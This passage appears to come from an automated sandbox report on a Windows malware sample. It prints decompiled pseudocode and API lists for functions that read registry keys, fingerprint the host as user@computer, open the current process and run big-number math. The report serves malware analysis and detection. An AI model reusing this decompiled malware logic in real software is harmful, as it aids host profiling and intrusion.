                                                          				signed int _v8;
                                                          				char _v12;
                                                          				signed int* _v16;
                                                          				char _v284;
                                                          				void* __esi;
                                                          				char* _t59;
                                                          				intOrPtr* _t60;
                                                          				intOrPtr _t64;
                                                          				char _t65;
                                                          				intOrPtr _t68;
                                                          				intOrPtr _t69;
                                                          				intOrPtr _t71;
                                                          				void* _t73;
                                                          				signed int _t81;
                                                          				void* _t91;
                                                          				void* _t92;
                                                          				char _t98;
                                                          				signed int* _t100;
                                                          				intOrPtr* _t101;
                                                          				void* _t102;
                                                          
                                                          				_t92 = __ecx;
                                                          				_v8 = _v8 & 0x00000000;
                                                          				_t98 = _a16;
                                                          				if(_t98 == 0) {
                                                          					__imp__( &_v284,  *0x47fd33c);
                                                          					_t91 = 0x80000002;
                                                          					L6:
                                                          					_t59 = E047F9070( &_v284,  &_v284);
                                                          					_a8 = _t59;
                                                          					if(_t59 == 0) {
                                                          						_v8 = 8;
                                                          						L29:
                                                          						_t60 = _a20;
                                                          						if(_t60 != 0) {
                                                          							 *_t60 =  *_t60 + 1;
                                                          						}
                                                          						return _v8;
                                                          					}
                                                          					_t101 = _a24;
                                                          					if(E047F6E98(_t92, _t97, _t101, _t91, _t59) != 0) {
                                                          						L27:
                                                          						E047FA734(_a8);
                                                          						goto L29;
                                                          					}
                                                          					_t64 =  *0x47fd278; // 0x52e9a98
                                                          					_t16 = _t64 + 0xc; // 0x52e9b66
                                                          					_t65 = E047F9070(_t64,  *_t16);
                                                          					_a24 = _t65;
                                                          					if(_t65 == 0) {
                                                          						L14:
                                                          						_t29 = _t101 + 0x14; // 0x102
                                                          						_t33 = _t101 + 0x10; // 0x3d047fc0
                                                          						if(E047F22F1(_t97,  *_t33, _t91, _a8,  *0x47fd334,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))) == 0) {
                                                          							_t68 =  *0x47fd2a8; // 0xaea5a8
                                                          							if(_t98 == 0) {
                                                          								_t35 = _t68 + 0x47fea3f; // 0x4d4c4b48
                                                          								_t69 = _t35;
                                                          							} else {
                                                          								_t34 = _t68 + 0x47fe8e7; // 0x55434b48
                                                          								_t69 = _t34;
                                                          							}
                                                          							if(E047F6C38(_t69,  *0x47fd334,  *0x47fd338,  &_a24,  &_a16) == 0) {
                                                          								if(_t98 == 0) {
                                                          									_t71 =  *0x47fd2a8; // 0xaea5a8
                                                          									_t44 = _t71 + 0x47fe846; // 0x74666f53
                                                          									_t73 = E047F9070(_t44, _t44);
                                                          									_t99 = _t73;
                                                          									if(_t73 == 0) {
                                                          										_v8 = 8;
                                                          									} else {
                                                          										_t47 = _t101 + 0x10; // 0x3d047fc0
                                                          										E047F5D7D( *_t47, _t91, _a8,  *0x47fd338, _a24);
                                                          										_t49 = _t101 + 0x10; // 0x3d047fc0
                                                          										E047F5D7D( *_t49, _t91, _t99,  *0x47fd330, _a16);
                                                          										E047FA734(_t99);
                                                          									}
                                                          								} else {
                                                          									_t40 = _t101 + 0x10; // 0x3d047fc0
                                                          									E047F5D7D( *_t40, _t91, _a8,  *0x47fd338, _a24);
                                                          									_t43 = _t101 + 0x10; // 0x3d047fc0
                                                          									E047F5D7D( *_t43, _t91, _a8,  *0x47fd330, _a16);
                                                          								}
                                                          								if( *_t101 != 0) {
                                                          									E047FA734(_a24);
                                                          								} else {
                                                          									 *_t101 = _a16;
                                                          								}
                                                          							}
                                                          						}
                                                          						goto L27;
                                                          					}
                                                          					_t21 = _t101 + 0x10; // 0x3d047fc0
                                                          					_t81 = E047F8BC1( *_t21, _t91, _a8, _t65,  &_v16,  &_v12);
                                                          					if(_t81 == 0) {
                                                          						_t100 = _v16;
                                                          						if(_v12 == 0x28) {
                                                          							 *_t100 =  *_t100 & _t81;
                                                          							_t26 = _t101 + 0x10; // 0x3d047fc0
                                                          							E047F22F1(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
                                                          						}
                                                          						E047FA734(_t100);
                                                          						_t98 = _a16;
                                                          					}
                                                          					E047FA734(_a24);
                                                          					goto L14;
                                                          				}
                                                          				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
                                                          					goto L29;
                                                          				} else {
                                                          					_t97 = _a8;
                                                          					E047FA749(_t98, _a8,  &_v284);
                                                          					__imp__(_t102 + _t98 - 0x117,  *0x47fd33c);
                                                          					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
                                                          					_t91 = 0x80000003;
                                                          					goto L6;
                                                          				}
                                                          			}
























                                                          APIs
                                                          • StrChrA.SHLWAPI(047F3741,0000005F,00000000,00000000,00000104), ref: 047F8572
                                                          • lstrcpy.KERNEL32(?,?), ref: 047F859F
                                                            • Part of subcall function 047F9070: lstrlen.KERNEL32(?,00000000,052E9A98,00000000,047F8808,052E9C76,?,?,?,?,?,63699BC3,00000005,047FD00C), ref: 047F9077
                                                            • Part of subcall function 047F9070: mbstowcs.NTDLL ref: 047F90A0
                                                            • Part of subcall function 047F9070: memset.NTDLL ref: 047F90B2
                                                            • Part of subcall function 047F5D7D: lstrlenW.KERNEL32(?,?,?,047F8708,3D047FC0,80000002,047F3741,047FA513,74666F53,4D4C4B48,047FA513,?,3D047FC0,80000002,047F3741,?), ref: 047F5DA2
                                                            • Part of subcall function 047FA734: HeapFree.KERNEL32(00000000,00000000,047F5637,00000000,?,?,00000000), ref: 047FA740
                                                          • lstrcpy.KERNEL32(?,00000000), ref: 047F85C1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.487149969.00000000047F1000.00000020.00000001.sdmp, Offset: 047F0000, based on PE: true
                                                          • Associated: 00000002.00000002.487122558.00000000047F0000.00000004.00000001.sdmp
                                                          • Associated: 00000002.00000002.487186321.00000000047FC000.00000002.00000001.sdmp
                                                          • Associated: 00000002.00000002.487214261.00000000047FD000.00000004.00000001.sdmp
                                                          • Associated: 00000002.00000002.487274365.00000000047FF000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                                                          • String ID: ($\
                                                          • API String ID: 3924217599-1512714803
                                                          • Opcode ID: 0cd4290f1b381adfd842cd6677e1e2e898f901c7453d0b8c75c2184f4254b426
                                                          • Instruction ID: a83ee791af4d8ad868444cc8a7de20eff27eeb92da6c8e5e020fe80d5df9a3f7
                                                          • Opcode Fuzzy Hash: 0cd4290f1b381adfd842cd6677e1e2e898f901c7453d0b8c75c2184f4254b426
                                                          • Instruction Fuzzy Hash: 8651297610060AEFEF21AFA1DD44EAA77B9FF04354F018514FB1596320E73AE915EB22
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E047FA199() {
                                                          				long _v8;
                                                          				long _v12;
                                                          				int _v16;
                                                          				long _t39;
                                                          				long _t43;
                                                          				signed int _t47;
                                                          				short _t51;
                                                          				signed int _t52;
                                                          				int _t56;
                                                          				int _t57;
                                                          				char* _t64;
                                                          				short* _t67;
                                                          
                                                          				_v16 = 0;
                                                          				_v8 = 0;
                                                          				GetUserNameW(0,  &_v8);
                                                          				_t39 = _v8;
                                                          				if(_t39 != 0) {
                                                          					_v12 = _t39;
                                                          					_v8 = 0;
                                                          					GetComputerNameW(0,  &_v8);
                                                          					_t43 = _v8;
                                                          					if(_t43 != 0) {
                                                          						_v12 = _v12 + _t43 + 2;
                                                          						_t64 = E047FA71F(_v12 + _t43 + 2 << 2);
                                                          						if(_t64 != 0) {
                                                          							_t47 = _v12;
                                                          							_t67 = _t64 + _t47 * 2;
                                                          							_v8 = _t47;
                                                          							if(GetUserNameW(_t67,  &_v8) == 0) {
                                                          								L7:
                                                          								E047FA734(_t64);
                                                          							} else {
                                                          								_t51 = 0x40;
                                                          								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
                                                          								_t52 = _v8;
                                                          								_v12 = _v12 - _t52;
                                                          								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
                                                          									goto L7;
                                                          								} else {
                                                          									_t56 = _v12 + _v8;
                                                          									_t31 = _t56 + 2; // 0x47f1fd4
                                                          									_v12 = _t56;
                                                          									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
                                                          									_v8 = _t57;
                                                          									if(_t57 == 0) {
                                                          										goto L7;
                                                          									} else {
                                                          										_t64[_t57] = 0;
                                                          										_v16 = _t64;
                                                          									}
                                                          								}
                                                          							}
                                                          						}
                                                          					}
                                                          				}
                                                          				return _v16;
                                                          			}
















                                                          APIs
                                                          • GetUserNameW.ADVAPI32(00000000,047F1FD2), ref: 047FA1AD
                                                          • GetComputerNameW.KERNEL32(00000000,047F1FD2), ref: 047FA1C9
                                                            • Part of subcall function 047FA71F: RtlAllocateHeap.NTDLL(00000000,00000000,047F5595), ref: 047FA72B
                                                          • GetUserNameW.ADVAPI32(00000000,047F1FD2), ref: 047FA203
                                                          • GetComputerNameW.KERNEL32(047F1FD2,?), ref: 047FA226
                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,047F1FD2,00000000,047F1FD4,00000000,00000000,?,?,047F1FD2), ref: 047FA249
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.487149969.00000000047F1000.00000020.00000001.sdmp, Offset: 047F0000, based on PE: true
                                                          • Associated: 00000002.00000002.487122558.00000000047F0000.00000004.00000001.sdmp
                                                          • Associated: 00000002.00000002.487186321.00000000047FC000.00000002.00000001.sdmp
                                                          • Associated: 00000002.00000002.487214261.00000000047FD000.00000004.00000001.sdmp
                                                          • Associated: 00000002.00000002.487274365.00000000047FF000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                                                          • String ID:
                                                          • API String ID: 3850880919-0
                                                          • Opcode ID: 3c90d92f5826c5b07947633206aa85efa32afa4b8fe06bc3f448833c604aa7f5
                                                          • Instruction ID: c6b1a635010ae997e1a9aaf359efc6a1b7930c24fef2c636b43b9b2a9db3da65
                                                          • Opcode Fuzzy Hash: 3c90d92f5826c5b07947633206aa85efa32afa4b8fe06bc3f448833c604aa7f5
                                                          • Instruction Fuzzy Hash: 1221C976A01208EFDB11DFE9DA849EEBBB8FA44304B1044AAE605E7340D635AB45DB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 58%
                                                          			E047F3DE9(void* __eax, intOrPtr _a4, intOrPtr _a8) {
                                                          				void* __esi;
                                                          				long _t10;
                                                          				void* _t18;
                                                          				void* _t22;
                                                          
                                                          				_t9 = __eax;
                                                          				_t22 = __eax;
                                                          				if(_a4 != 0 && E047F5AF1(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
                                                          					L9:
                                                          					return GetLastError();
                                                          				}
                                                          				_t10 = E047FA81C(_t9, _t18, _t22, _a8);
                                                          				if(_t10 == 0) {
                                                          					ResetEvent( *(_t22 + 0x1c));
                                                          					ResetEvent( *(_t22 + 0x20));
                                                          					_push(0);
                                                          					_push(0);
                                                          					_push(0xffffffff);
                                                          					_push(0);
                                                          					_push( *((intOrPtr*)(_t22 + 0x18)));
                                                          					if( *0x47fd128() != 0) {
                                                          						SetEvent( *(_t22 + 0x1c));
                                                          						goto L7;
                                                          					} else {
                                                          						_t10 = GetLastError();
                                                          						if(_t10 == 0x3e5) {
                                                          							L7:
                                                          							_t10 = 0;
                                                          						}
                                                          					}
                                                          				}
                                                          				if(_t10 == 0xffffffff) {
                                                          					goto L9;
                                                          				}
                                                          				return _t10;
                                                          			}








                                                          APIs
                                                          • ResetEvent.KERNEL32(?,00000008,?,?,00000102,047F67B8,?,?,00000000,00000000), ref: 047F3E23
                                                          • ResetEvent.KERNEL32(?), ref: 047F3E28
                                                          • GetLastError.KERNEL32 ref: 047F3E40
                                                          • GetLastError.KERNEL32(?,?,00000102,047F67B8,?,?,00000000,00000000), ref: 047F3E5B
                                                            • Part of subcall function 047F5AF1: lstrlen.KERNEL32(00000000,00000008,?,74B04D40,?,?,047F3E08,?,?,?,?,00000102,047F67B8,?,?,00000000), ref: 047F5AFD
                                                            • Part of subcall function 047F5AF1: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,047F3E08,?,?,?,?,00000102,047F67B8,?), ref: 047F5B5B
                                                            • Part of subcall function 047F5AF1: lstrcpy.KERNEL32(00000000,00000000), ref: 047F5B6B
                                                          • SetEvent.KERNEL32(?), ref: 047F3E4E
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.487149969.00000000047F1000.00000020.00000001.sdmp, Offset: 047F0000, based on PE: true
                                                          • Associated: 00000002.00000002.487122558.00000000047F0000.00000004.00000001.sdmp
                                                          • Associated: 00000002.00000002.487186321.00000000047FC000.00000002.00000001.sdmp
                                                          • Associated: 00000002.00000002.487214261.00000000047FD000.00000004.00000001.sdmp
                                                          • Associated: 00000002.00000002.487274365.00000000047FF000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Event$ErrorLastReset$lstrcpylstrlenmemcpy
                                                          • String ID:
                                                          • API String ID: 1449191863-0
                                                          • Opcode ID: 561888a447012ee487e946a1a5d3c03d86ad6f77a148cdfbda549cb7d68d2d97
                                                          • Instruction ID: c827f5df9bc7f778c9c6935e982b14c9192adfd877bb9b4a4b29e3a706033250
                                                          • Opcode Fuzzy Hash: 561888a447012ee487e946a1a5d3c03d86ad6f77a148cdfbda549cb7d68d2d97
                                                          • Instruction Fuzzy Hash: 4E014B31104201ABEB316B71DC48F5BBBA8FF48B64F114A26FA51D13E0D761E8159B65
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E047F3E69(intOrPtr _a4) {
                                                          				void* _t2;
                                                          				unsigned int _t4;
                                                          				void* _t5;
                                                          				long _t6;
                                                          				void* _t7;
                                                          				void* _t15;
                                                          
                                                          				_t2 = CreateEventA(0, 1, 0, 0);
                                                          				 *0x47fd26c = _t2;
                                                          				if(_t2 == 0) {
                                                          					return GetLastError();
                                                          				}
                                                          				_t4 = GetVersion();
                                                          				if(_t4 != 5) {
                                                          					L4:
                                                          					if(_t15 <= 0) {
                                                          						_t5 = 0x32;
                                                          						return _t5;
                                                          					}
                                                          					L5:
                                                          					 *0x47fd25c = _t4;
                                                          					_t6 = GetCurrentProcessId();
                                                          					 *0x47fd258 = _t6;
                                                          					 *0x47fd264 = _a4;
                                                          					_t7 = OpenProcess(0x10047a, 0, _t6);
                                                          					 *0x47fd254 = _t7;
                                                          					if(_t7 == 0) {
                                                          						 *0x47fd254 =  *0x47fd254 | 0xffffffff;
                                                          					}
                                                          					return 0;
                                                          				}
                                                          				if(_t4 >> 8 > 0) {
                                                          					goto L5;
                                                          				}
                                                          				_t15 = _t4 - _t4;
                                                          				goto L4;
                                                          			}










                                                          APIs
                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,047F131F,?,?,00000001,?,?,?,047F4EF2,?), ref: 047F3E71
                                                          • GetVersion.KERNEL32(?,00000001,?,?,?,047F4EF2,?), ref: 047F3E80
                                                          • GetCurrentProcessId.KERNEL32(?,00000001,?,?,?,047F4EF2,?), ref: 047F3E9C
                                                          • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001,?,?,?,047F4EF2,?), ref: 047F3EB9
                                                          • GetLastError.KERNEL32(?,00000001,?,?,?,047F4EF2,?), ref: 047F3ED8
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.487149969.00000000047F1000.00000020.00000001.sdmp, Offset: 047F0000, based on PE: true
                                                          • Associated: 00000002.00000002.487122558.00000000047F0000.00000004.00000001.sdmp
                                                          • Associated: 00000002.00000002.487186321.00000000047FC000.00000002.00000001.sdmp
                                                          • Associated: 00000002.00000002.487214261.00000000047FD000.00000004.00000001.sdmp
                                                          • Associated: 00000002.00000002.487274365.00000000047FF000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                                          • String ID:
                                                          • API String ID: 2270775618-0
                                                          • Opcode ID: 3ba371c77714e289da1ac0edc8746360fbb044475e47d9d8835095b35988756d
                                                          • Instruction ID: 103045106ab8d71f88d40b1369ab5e64c51cb91d441e5e915aa88e86a2fbd91e
                                                          • Opcode Fuzzy Hash: 3ba371c77714e289da1ac0edc8746360fbb044475e47d9d8835095b35988756d
                                                          • Instruction Fuzzy Hash: 28F04470645305AFE7318FB99E19B997B51FB84741F108915EE43CA3C0D778D842CB55
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 46%
                                                          			E047F6F3A(intOrPtr* __eax) {
                                                          				void* _v8;
                                                          				WCHAR* _v12;
                                                          				void* _v16;
                                                          				char _v20;
                                                          				void* _v24;
                                                          				intOrPtr _v28;
                                                          				void* _v32;
                                                          				intOrPtr _v40;
                                                          				short _v48;
                                                          				intOrPtr _v56;
                                                          				short _v64;
                                                          				intOrPtr* _t54;
                                                          				intOrPtr* _t56;
                                                          				intOrPtr _t57;
                                                          				intOrPtr* _t58;
                                                          				intOrPtr* _t60;
                                                          				void* _t61;
                                                          				intOrPtr* _t63;
                                                          				intOrPtr* _t65;
                                                          				short _t67;
                                                          				intOrPtr* _t68;
                                                          				intOrPtr* _t70;
                                                          				intOrPtr* _t72;
                                                          				intOrPtr* _t75;
                                                          				intOrPtr* _t77;
                                                          				intOrPtr _t79;
                                                          				intOrPtr* _t83;
                                                          				intOrPtr* _t87;
                                                          				intOrPtr _t103;
                                                          				intOrPtr _t109;
                                                          				void* _t118;
                                                          				void* _t122;
                                                          				void* _t123;
                                                          				intOrPtr _t130;
                                                          
                                                          				_t123 = _t122 - 0x3c;
                                                          				_push( &_v8);
                                                          				_push(__eax);
                                                          				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
                                                          				if(_t118 >= 0) {
                                                          					_t54 = _v8;
                                                          					_t103 =  *0x47fd2a8; // 0xaea5a8
                                                          					_t5 = _t103 + 0x47fe038; // 0x3050f485
                                                          					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
                                                          					_t56 = _v8;
                                                          					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
                                                          					if(_t118 >= 0) {
                                                          						__imp__#2(0x47fc290);
                                                          						_v28 = _t57;
                                                          						if(_t57 == 0) {
                                                          							_t118 = 0x8007000e;
                                                          						} else {
                                                          							_t60 = _v32;
                                                          							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
                                                          							_t87 = __imp__#6;
                                                          							_t118 = _t61;
                                                          							if(_t118 >= 0) {
                                                          								_t63 = _v24;
                                                          								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
                                                          								if(_t118 >= 0) {
                                                          									_t130 = _v20;
                                                          									if(_t130 != 0) {
                                                          										_t67 = 3;
                                                          										_v64 = _t67;
                                                          										_v48 = _t67;
                                                          										_v56 = 0;
                                                          										_v40 = 0;
                                                          										if(_t130 > 0) {
                                                          											while(1) {
                                                          												_t68 = _v24;
                                                          												asm("movsd");
                                                          												asm("movsd");
                                                          												asm("movsd");
                                                          												asm("movsd");
                                                          												_t123 = _t123;
                                                          												asm("movsd");
                                                          												asm("movsd");
                                                          												asm("movsd");
                                                          												asm("movsd");
                                                          												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
                                                          												if(_t118 < 0) {
                                                          													goto L16;
                                                          												}
                                                          												_t70 = _v8;
                                                          												_t109 =  *0x47fd2a8; // 0xaea5a8
                                                          												_t28 = _t109 + 0x47fe0bc; // 0x3050f1ff
                                                          												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
                                                          												if(_t118 >= 0) {
                                                          													_t75 = _v16;
                                                          													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
                                                          													if(_t118 >= 0 && _v12 != 0) {
                                                          														_t79 =  *0x47fd2a8; // 0xaea5a8
                                                          														_t33 = _t79 + 0x47fe078; // 0x76006f
                                                          														if(lstrcmpW(_v12, _t33) == 0) {
                                                          															_t83 = _v16;
                                                          															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
                                                          														}
                                                          														 *_t87(_v12);
                                                          													}
                                                          													_t77 = _v16;
                                                          													 *((intOrPtr*)( *_t77 + 8))(_t77);
                                                          												}
                                                          												_t72 = _v8;
                                                          												 *((intOrPtr*)( *_t72 + 8))(_t72);
                                                          												_v40 = _v40 + 1;
                                                          												if(_v40 < _v20) {
                                                          													continue;
                                                          												}
                                                          												goto L16;
                                                          											}
                                                          										}
                                                          									}
                                                          								}
                                                          								L16:
                                                          								_t65 = _v24;
                                                          								 *((intOrPtr*)( *_t65 + 8))(_t65);
                                                          							}
                                                          							 *_t87(_v28);
                                                          						}
                                                          						_t58 = _v32;
                                                          						 *((intOrPtr*)( *_t58 + 8))(_t58);
                                                          					}
                                                          				}
                                                          				return _t118;
                                                          			}

                                                          APIs
                                                          • SysAllocString.OLEAUT32(047FC290), ref: 047F6F8A
                                                          • lstrcmpW.KERNEL32(00000000,0076006F), ref: 047F706B
                                                          • SysFreeString.OLEAUT32(00000000), ref: 047F7084
                                                          • SysFreeString.OLEAUT32(?), ref: 047F70B3
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.487149969.00000000047F1000.00000020.00000001.sdmp, Offset: 047F0000, based on PE: true
                                                          • Associated: 00000002.00000002.487122558.00000000047F0000.00000004.00000001.sdmp
                                                          • Associated: 00000002.00000002.487186321.00000000047FC000.00000002.00000001.sdmp
                                                          • Associated: 00000002.00000002.487214261.00000000047FD000.00000004.00000001.sdmp
                                                          • Associated: 00000002.00000002.487274365.00000000047FF000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: String$Free$Alloclstrcmp
                                                          • String ID:
                                                          • API String ID: 1885612795-0
                                                          • Opcode ID: cab95383808e53f86bdc8b437c0945fed9042c897f3cf2be0e12f9f8309b81ab
                                                          • Instruction ID: 69585ec8cd0733fd6f3319ec0b88ed5070a7b093d2892500d4c8d825223c3d07
                                                          • Opcode Fuzzy Hash: cab95383808e53f86bdc8b437c0945fed9042c897f3cf2be0e12f9f8309b81ab
                                                          • Instruction Fuzzy Hash: 4E511C75900519EFCB15DFE8C888DAEB7B9FF89704B148998E915EB310D732AD41CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 85%
                                                          			E047F53C6(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
                                                          				intOrPtr _v8;
                                                          				intOrPtr _v12;
                                                          				signed int _v16;
                                                          				void _v92;
                                                          				void _v236;
                                                          				void* _t55;
                                                          				unsigned int _t56;
                                                          				signed int _t66;
                                                          				signed int _t74;
                                                          				void* _t76;
                                                          				signed int _t79;
                                                          				void* _t81;
                                                          				void* _t92;
                                                          				void* _t96;
                                                          				signed int* _t99;
                                                          				signed int _t101;
                                                          				signed int _t103;
                                                          				void* _t107;
                                                          
                                                          				_t92 = _a12;
                                                          				_t101 = __eax;
                                                          				_t55 = E047F1AD1(_a16, _t92);
                                                          				_t79 = _t55;
                                                          				if(_t79 == 0) {
                                                          					L18:
                                                          					return _t55;
                                                          				}
                                                          				_t56 =  *(_t92 + _t79 * 4 - 4);
                                                          				_t81 = 0;
                                                          				_t96 = 0x20;
                                                          				if(_t56 == 0) {
                                                          					L4:
                                                          					_t97 = _t96 - _t81;
                                                          					_v12 = _t96 - _t81;
                                                          					E047F50FF(_t79,  &_v236);
                                                          					 *((intOrPtr*)(_t107 + _t101 * 4 - 0xe8)) = E047F5745(_t101,  &_v236, _a8, _t96 - _t81);
                                                          					E047F5745(_t79,  &_v92, _a12, _t97);
                                                          					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x5c));
                                                          					_t66 = E047F50FF(_t101, 0x47fd1b0);
                                                          					_t103 = _t101 - _t79;
                                                          					_a8 = _t103;
                                                          					if(_t103 < 0) {
                                                          						L17:
                                                          						E047F50FF(_a16, _a4);
                                                          						E047F5088(_t79,  &_v236, _a4, _t97);
                                                          						memset( &_v236, 0, 0x8c);
                                                          						_t55 = memset( &_v92, 0, 0x44);
                                                          						goto L18;
                                                          					}
                                                          					_t99 = _t107 + (_t103 + _t79) * 4 - 0xe8;
                                                          					do {
                                                          						if(_v8 != 0xffffffff) {
                                                          							_push(1);
                                                          							_push(0);
                                                          							_push(0);
                                                          							_push( *_t99);
                                                          							L047FAF2E();
                                                          							_t74 = _t66 +  *(_t99 - 4);
                                                          							asm("adc edx, esi");
                                                          							_push(0);
                                                          							_push(_v8 + 1);
                                                          							_push(_t92);
                                                          							_push(_t74);
                                                          							L047FAF28();
                                                          							if(_t92 > 0 || _t74 > 0xffffffff) {
                                                          								_t74 = _t74 | 0xffffffff;
                                                          								_v16 = _v16 & 0x00000000;
                                                          							}
                                                          						} else {
                                                          							_t74 =  *_t99;
                                                          						}
                                                          						_t106 = _t107 + _a8 * 4 - 0xe8;
                                                          						_a12 = _t74;
                                                          						_t76 = E047F5F21(_t79,  &_v92, _t92, _t107 + _a8 * 4 - 0xe8, _t107 + _a8 * 4 - 0xe8, _t74);
                                                          						while(1) {
                                                          							 *_t99 =  *_t99 - _t76;
                                                          							if( *_t99 != 0) {
                                                          								goto L14;
                                                          							}
                                                          							L13:
                                                          							_t92 =  &_v92;
                                                          							if(E047F90C2(_t79, _t92, _t106) < 0) {
                                                          								break;
                                                          							}
                                                          							L14:
                                                          							_a12 = _a12 + 1;
                                                          							_t76 = E047F6044(_t79,  &_v92, _t106, _t106);
                                                          							 *_t99 =  *_t99 - _t76;
                                                          							if( *_t99 != 0) {
                                                          								goto L14;
                                                          							}
                                                          							goto L13;
                                                          						}
                                                          						_a8 = _a8 - 1;
                                                          						_t66 = _a12;
                                                          						_t99 = _t99 - 4;
                                                          						 *(0x47fd1b0 + _a8 * 4) = _t66;
                                                          					} while (_a8 >= 0);
                                                          					_t97 = _v12;
                                                          					goto L17;
                                                          				}
                                                          				while(_t81 < _t96) {
                                                          					_t81 = _t81 + 1;
                                                          					_t56 = _t56 >> 1;
                                                          					if(_t56 != 0) {
                                                          						continue;
                                                          					}
                                                          					goto L4;
                                                          				}
                                                          				goto L4;
                                                          			}

                                                          APIs
                                                          • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 047F5473
                                                          • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 047F5489
                                                          • memset.NTDLL ref: 047F5529
                                                          • memset.NTDLL ref: 047F5539
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.487149969.00000000047F1000.00000020.00000001.sdmp, Offset: 047F0000, based on PE: true
                                                          • Associated: 00000002.00000002.487122558.00000000047F0000.00000004.00000001.sdmp
                                                          • Associated: 00000002.00000002.487186321.00000000047FC000.00000002.00000001.sdmp
                                                          • Associated: 00000002.00000002.487214261.00000000047FD000.00000004.00000001.sdmp
                                                          • Associated: 00000002.00000002.487274365.00000000047FF000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: memset$_allmul_aulldiv
                                                          • String ID:
                                                          • API String ID: 3041852380-0
                                                          • Opcode ID: 2138f34053359cfa7159a4946645b6ecf934a1ab1c9161975e22f0c4cb9d0f74
                                                          • Instruction ID: 0be07e14e35eef8c6bbb8feab11ecb59d70d07eec0a39185064e391880c472e6
                                                          • Opcode Fuzzy Hash: 2138f34053359cfa7159a4946645b6ecf934a1ab1c9161975e22f0c4cb9d0f74
                                                          • Instruction Fuzzy Hash: 83415371600219BBEB109FA8CC84BEE77A5EF44714F108529FA1AA7385DB70BD558B90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • lstrlen.KERNEL32(?,00000008,74B04D40), ref: 047FA82E
                                                            • Part of subcall function 047FA71F: RtlAllocateHeap.NTDLL(00000000,00000000,047F5595), ref: 047FA72B
                                                          • ResetEvent.KERNEL32(?), ref: 047FA8A2
                                                          • GetLastError.KERNEL32 ref: 047FA8C5
                                                          • GetLastError.KERNEL32 ref: 047FA970
                                                            • Part of subcall function 047FA734: HeapFree.KERNEL32(00000000,00000000,047F5637,00000000,?,?,00000000), ref: 047FA740
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.487149969.00000000047F1000.00000020.00000001.sdmp, Offset: 047F0000, based on PE: true
                                                          • Associated: 00000002.00000002.487122558.00000000047F0000.00000004.00000001.sdmp
                                                          • Associated: 00000002.00000002.487186321.00000000047FC000.00000002.00000001.sdmp
                                                          • Associated: 00000002.00000002.487214261.00000000047FD000.00000004.00000001.sdmp
                                                          • Associated: 00000002.00000002.487274365.00000000047FF000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: ErrorHeapLast$AllocateEventFreeResetlstrlen
                                                          • String ID:
                                                          • API String ID: 943265810-0
                                                          • Opcode ID: 37bd3f50213cc5f4ae6f7b7c55dbf02415a7e473a4bf4b47916c2fb1f92e0501
                                                          • Instruction ID: 9ef2955bce944a35e825b7575f989e0377dfe2c2fe813171151ca1f6d4e4f530
                                                          • Opcode Fuzzy Hash: 37bd3f50213cc5f4ae6f7b7c55dbf02415a7e473a4bf4b47916c2fb1f92e0501
                                                          • Instruction Fuzzy Hash: 5A419C71500604BFDB329FA1CC88EAB7BBDEB89700B118929F646D2790E775A945DB30
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 42%
                                                          			E047F15FF(void* __eax, void* __ecx) {
                                                          				char _v8;
                                                          				void* _v12;
                                                          				intOrPtr _v16;
                                                          				char _v20;
                                                          				void* __esi;
                                                          				void* _t30;
                                                          				intOrPtr _t38;
                                                          				intOrPtr* _t39;
                                                          				intOrPtr* _t41;
